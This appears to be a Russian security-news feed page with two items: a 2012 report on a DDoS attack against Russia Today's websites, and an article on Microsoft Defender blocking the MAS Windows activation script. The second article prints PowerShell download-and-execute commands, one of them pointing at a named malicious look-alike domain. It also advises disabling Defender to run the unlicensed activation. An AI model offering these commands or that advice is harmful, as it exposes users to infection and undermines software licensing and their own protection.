Хакеры отомстили Russia Today за поддержку Дж.Ассанджа DDoS-атаками

Хакеры отомстили Russia Today за поддержку Дж.Ассанджа DDoS-атаками

Сайты телеканала Russia Today rt.com (на английском) и actualidad.rt.com (на испанском) подверглись массовой DDoS-атаке. Сначала сообщение об этом появилось в микроблоге издания, позднее информацию подтвердила в Twitter главный редактор Маргарита Симоньян, а также хакерская группировка Anti Leaks на своем аккаунте. Последняя взяла на себя ответственность за выведение из строя информационных порталов. Отметим, запись хакеров содержит хэштег #FreePussyRiot ("Свободу Pussy Riot").

Ранее хакеры из Anti Leaks провели атаки на сайты wikileaks.org и bambuser.com, предоставляющие возможность вести видеотрансляции. Перед атакой на ресурсы Russia Today стало известно, что сервис планирует прямое включение из посольства Эквадора в Великобритании, где с 19 июня укрывается создатель WikiLeaks Джулиан Ассандж.

Распределенная атака началась около 09:00 мск. В результате IP-адрес был отключен, спустя некоторое время работу сайтов удалось восстановить. Около 14:00 DDoS-атаки усилились, в результате чего rt.com стал полностью недоступен. Количество одновременно поступающих запросов на сайты было таковым, что поток информации достигал скорости 8-9 гигабайт в секунду, что сравнимо с атаками на WikiLeaks 12 августа этого года. Руководство канала связывает атаки с тем, что Дж.Ассандж некогда вел ток-шоу на Russia Today, в котором беседовал с различными гостями о политике. Напомним, первым гостем Дж.Ассанджа стал лидер организации "Хезболла" Хасан Насралла, сообщает rbc.ru.

На прямую связь атак с вынесением приговора участницам Pussy Riot сегодня в Хамовническом суде Москвы в Russia Today пока не указывали.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru